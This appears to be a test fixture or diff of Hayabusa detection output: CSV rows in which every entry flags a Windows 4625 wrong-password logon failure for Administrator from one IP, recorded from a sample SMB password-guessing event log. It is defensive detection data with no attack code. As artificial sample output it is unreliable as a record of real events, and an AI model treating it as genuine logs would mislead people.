+2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
